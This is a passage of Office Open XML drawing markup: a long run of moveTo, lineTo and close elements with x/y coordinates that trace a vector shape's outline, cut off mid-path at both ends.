                    <a:pt x="3911" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3885" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3858" y="4799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3837" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3816" y="4835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3801" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3790" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4956"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2698" y="4174"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2813" y="4132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2976" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="4137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="4132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3070" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3155" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3239" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270" y="4226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="4315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3291" y="4578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="4667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3191" y="4709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3034" y="4589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960" y="4526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2887" y="4457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819" y="4384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2750" y="4310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="4232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2698" y="4174"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3223" y="3979"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3223" y="3979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2992" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2955" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2940" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="4027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2861" y="4042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2793" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2724" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2640" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609" y="4116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="4038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776" y="3964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040" y="3854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3191" y="3880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3223" y="3979"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4220" y="4856"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4184" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4068" y="5197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3953" y="5318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3942" y="5303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3926" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3926" y="5292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="5192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3963" y="5087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989" y="5077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011" y="5066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="5056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="5019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4079" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4158" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189" y="4883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4189" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4158" y="4898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4121" y="4919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4084" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4063" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="4835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4011" y="4804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3984" y="4788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3948" y="4704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3932" y="4620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3911" y="4541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3890" y="4457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864" y="4379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3832" y="4300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3795" y="4221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3758" y="4142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969" y="4205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4052" y="4252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4131" y="4305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4047" y="4237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3958" y="4174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3869" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3779" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3769" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3748" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3722" y="4006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3706" y="4001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3690" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3680" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3611" y="3885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3528" y="3727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3517" y="3707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="3696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="3691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3423" y="3591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3464" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="3507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3522" y="3460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3543" y="3418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564" y="3323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3564" y="3281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3554" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3559" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3548" y="3360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3533" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3507" y="3439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3481" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3444" y="3523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3401" y="3565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3381" y="3554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3354" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3334" y="3549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3270" y="3497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3213" y="3444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3150" y="3391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081" y="3344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950" y="3260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2808" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719" y="3119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2672" y="3097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629" y="3082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2703" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2772" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656" y="3134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="3103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609" y="3124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2687" y="3155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2840" y="3234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2966" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="3497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="3627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3281" y="3654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3187" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123" y="3597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3013" y="3423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929" y="3323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3018" y="3480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3144" y="3738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3023" y="3801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897" y="3859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2761" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2625" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2603" y="3932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2582" y="3911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="3895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="3901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="3801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="3707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2399" y="3607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388" y="3512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2388" y="3413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2425" y="3176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2393" y="3271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2378" y="3318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362" y="3418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2357" y="3517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367" y="3617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2383" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446" y="3921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2430" y="3938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2415" y="3958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="3985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2404" y="4021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283" y="4053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="4090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1690" y="4074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695" y="4079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="4105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2063" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2420" y="4068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2435" y="4095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2462" y="4111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2488" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519" y="4127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2556" y="4148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2551" y="4163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546" y="4185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="4247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362" y="4315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283" y="4389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2210" y="4473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="4562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2078" y="4652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2026" y="4751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989" y="4856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1958" y="4862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1931" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="4888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1890" y="4903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1769" y="4809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711" y="4762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658" y="4715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559" y="4609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517" y="4552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="4499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511" y="4568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1548" y="4630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="4693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="4756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685" y="4814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737" y="4872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1795" y="4924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="5040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="5077"/>
